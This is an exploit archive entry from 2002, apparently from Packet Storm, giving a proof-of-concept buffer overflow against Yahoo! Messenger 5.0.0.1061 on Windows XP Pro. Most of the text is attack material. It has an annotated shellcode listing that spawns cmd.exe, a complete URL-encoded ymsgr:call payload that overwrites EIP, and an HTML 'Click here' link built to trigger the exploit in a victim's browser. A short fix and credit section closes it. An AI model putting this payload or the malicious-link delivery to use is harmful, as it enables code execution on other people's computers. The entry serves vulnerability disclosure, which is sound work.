Yahoo! Messenger v5,0,0,1061 buffer overflow exploit for Windows XP Pro. Shellcode spawns cmd.exe. Fix available here.
596e8d32292e00213f89d2811227c7e70b98b19be3b42189a13ad01d3f5aa08f
Yahoo! Messenger (5,0,0,1061) Buffer Overflow Exploit for Win XP Pro
Intro:
Proof of concept code for YM Buffer Overflow as discovered in:
http://packetstorm.decepticons.org/advisories/misc/yahoo-im.txt
Code flow:
Overwrite EIP at 218
Point EIP to a "RET" in the memory
"RET" jumps to beginning of shellcode
Shellcode spawns cmd.exe
Terminate YM gracefully :)
'shellcode':
55 push ebp
54 push esp
5D pop ebp
33 FF xor edi,edi
57 push edi
C6 45 FC 63 mov byte ptr [ebp-04h],'c'
C6 45 FD 6D mov byte ptr [ebp-03h],'m'
C6 45 FE 64 mov byte ptr [ebp-02h],'d'
57 push edi
C6 45 F8 03 mov byte ptr[ebp-08h],3 ;Max window
8D 45 FC lea eax,[ebp-4h]
50 push eax
B8 7E684C67 mov eax,7E684C67h ;CreateProcess@77E684C6h
C1 C8 04 ror eax, 4
FF D0 call eax
B8 7EB854B7 mov eax,7EB854B7h ;FatalExit@77EB854Bh
C1 C8 04 ror eax, 4
FF D0 call eax
Test:
Parse this to your IE browser
ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77
Or put this into an HTML file
<a href="ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77">Click here</a>
Fix:
Update YM at http://messenger.yahoo.com/
Credit:
sk@scan-associates.net
31 May 2002